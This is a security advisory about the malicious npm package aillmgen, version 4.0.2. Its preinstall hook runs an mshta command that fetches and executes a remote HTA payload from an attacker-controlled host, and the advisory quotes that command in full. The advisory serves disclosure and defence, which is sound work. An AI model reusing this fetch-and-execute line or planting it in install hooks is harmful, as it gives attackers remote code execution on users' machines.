npm · Malicious package advisory
Malwareaillmgen
MAL-2026-5927
Malicious code in aillmgen (npm)
Details
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (5b303e830a204ad1ee237f0403a2844f5dce96fa3e3841392ce92d7f3f502341)
On `npm install`, the package's preinstall hook (preinstall.js) runs `exec('cmd /c "mshta http://fixars.top"')`, invoking the Windows mshta.exe binary to fetch and execute an HTA payload from http://fixars.top with the installer's privileges. mshta is a well-known living-off-the-land binary that executes arbitrary HTA/JScript/VBScript content directly from a remote URL, giving the operator of fixars.top remote code execution on any Windows machine that installs this package. The remote endpoint is plain HTTP and attacker-mutable, and the behavior is unrelated to the package's stated LLM-client purpose (the library code references an EasyLLMClient targeting api.easyllm.ai while the package itself is published under the unrelated name `aillmgen` with empty author and description metadata). The combination of install-time RCE, plaintext attacker-controlled fetch-and-execute, impersonation of an LLM-client utility, and placeholder publisher metadata is a supply-chain dropper.
Compromised versions (1)
- 4.0.2
Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.